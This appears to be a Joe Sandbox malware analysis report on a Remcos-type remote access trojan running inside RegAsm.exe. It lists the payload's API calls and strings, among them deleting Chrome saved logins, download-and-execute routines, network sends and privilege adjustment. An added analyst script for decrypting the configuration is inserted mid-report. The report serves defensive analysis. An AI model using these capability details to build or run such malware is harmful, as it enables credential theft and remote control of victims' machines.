                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                • API String ID: 2127411465-314212984
                                                • Opcode ID: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                • Opcode Fuzzy Hash: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                APIs
                                                • _free.LIBCMT ref: 00449292
                                                • _free.LIBCMT ref: 004492B6
                                                • _free.LIBCMT ref: 0044943D
                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                • _free.LIBCMT ref: 00449609
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                • String ID:
                                                • API String ID: 314583886-0
                                                • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                APIs
                                                  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                • API String ID: 1589313981-2876530381
                                                • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                APIs
                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                • GetLastError.KERNEL32 ref: 0040BA93
                                                Strings
                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                • UserProfile, xrefs: 0040BA59
                                                • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteErrorFileLast
                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                • API String ID: 2018770650-1062637481
                                                • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                • GetLastError.KERNEL32 ref: 004179D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                • String ID: SeShutdownPrivilege
                                                • API String ID: 3534403312-3733053543
                                                • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 00409293
                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00DA4958,00000010), ref: 004048E0
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                • FindClose.KERNEL32(00000000), ref: 004093FC
                                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                • FindClose.KERNEL32(00000000), ref: 004095F4
                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                • String ID:
                                                • API String ID: 1824512719-0
                                                • Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                • Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                • String ID:
                                                • API String ID: 276877138-0
                                                • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: ACP$OCP
                                                • API String ID: 2299586839-711371036
                                                • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                APIs
                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Resource$FindLoadLockSizeof
                                                • String ID: SETTINGS
                                                • API String ID: 3473537107-594951305
                                                • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
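                                                The function above only shows the payload locating an RT_RCDATA (type 0x0A) resource named SETTINGS, which is where Remcos keeps its configuration. The parser below is an added example for analysts, not code from this report or from the malware; the blob layout it assumes (one key-length byte, the RC4 key, then the RC4-encrypted configuration with fields separated by `|\x1e\x1e\x1f|`) comes from public analyses of Remcos and is not stated anywhere in this report. The sample blob, key and field values are constructed so the script runs offline; against a real sample the bytes would be read from the PE resource directory (for instance with pefile) instead.

```python
"""Parse a Remcos-style SETTINGS resource blob (added example, not report code).

Assumed layout (from public Remcos write-ups, not from this report):
  blob[0]            key length n
  blob[1 : 1+n]      RC4 key
  blob[1+n :]        RC4-encrypted configuration, fields joined by FIELD_SEP
"""
from __future__ import annotations

FIELD_SEP = b"|\x1e\x1e\x1f|"   # assumed separator used by recent Remcos builds


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric: the same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_settings(blob: bytes, sep: bytes = FIELD_SEP) -> list[bytes]:
    """Split the blob into key and ciphertext, decrypt, and split into fields."""
    if len(blob) < 2:
        raise ValueError("blob too short to hold a key-length byte and a key")
    key_len = blob[0]
    key = blob[1:1 + key_len]
    if key_len == 0 or len(key) != key_len:
        raise ValueError("key-length byte does not match the available bytes")
    plaintext = rc4(key, blob[1 + key_len:])
    return plaintext.split(sep)


def build_settings(key: bytes, fields: list[bytes], sep: bytes = FIELD_SEP) -> bytes:
    """Inverse of parse_settings; used here only to construct the offline sample."""
    if not 0 < len(key) < 256:
        raise ValueError("key length must fit in one byte")
    return bytes([len(key)]) + key + rc4(key, sep.join(fields))


def c2_entries(fields: list[bytes]) -> list[tuple[str, int]]:
    """Extract (host, port) pairs from the first field, assumed to hold
    '|'-joined host:port:flag entries as in public Remcos analyses."""
    entries = []
    for item in fields[0].split(b"|"):
        parts = item.split(b":")
        if len(parts) >= 2 and parts[1].isdigit():
            entries.append((parts[0].decode("latin-1"), int(parts[1])))
    return entries


# Constructed sample. Hostnames, key and placeholder fields are invented for
# this demo and are NOT indicators taken from the report above.
SAMPLE_FIELDS = [
    b"c2.example.test:2404:1|backup.example.test:2404:1",
    b"Remcos-Demo",      # placeholder campaign name
    b"1",                # placeholder flag field
    b"remcos.exe",       # placeholder install filename
]
SAMPLE_KEY = b"demo-rc4-key-0123"
SAMPLE_BLOB = build_settings(SAMPLE_KEY, SAMPLE_FIELDS)


if __name__ == "__main__":
    parsed = parse_settings(SAMPLE_BLOB)
    for idx, field in enumerate(parsed):
        print(idx, field)
    print("C2:", c2_entries(parsed))
```

                                                The field order and meaning beyond the leading C2 list vary between Remcos versions, so treat the positional placeholders above as an assumption to be confirmed against the sample's own strings (the C2 entries in this report's malware configuration are the natural cross-check).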
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 004096A5
                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstH_prologNext
                                                • String ID:
                                                • API String ID: 1157919129-0
                                                • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 0040884C
                                                • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                • String ID:
                                                • API String ID: 1771804793-0
                                                • Opcode ID: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                                • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                • Opcode Fuzzy Hash: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                                • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DownloadExecuteFileShell
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                • API String ID: 2825088817-3056885514
                                                • Opcode ID: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                                • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                • Opcode Fuzzy Hash: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                                • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileFind$FirstNextsend
                                                • String ID: XPG$XPG
                                                • API String ID: 4113138495-1962359302
                                                • Opcode ID: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                                                • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                • Opcode Fuzzy Hash: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                                                • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                APIs
                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                  • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateInfoParametersSystemValue
                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                • API String ID: 4127273184-3576401099
                                                • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID: p'E$JD
                                                • API String ID: 1084509184-908320845
                                                • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                • String ID:
                                                • API String ID: 2829624132-0
                                                • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                 • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
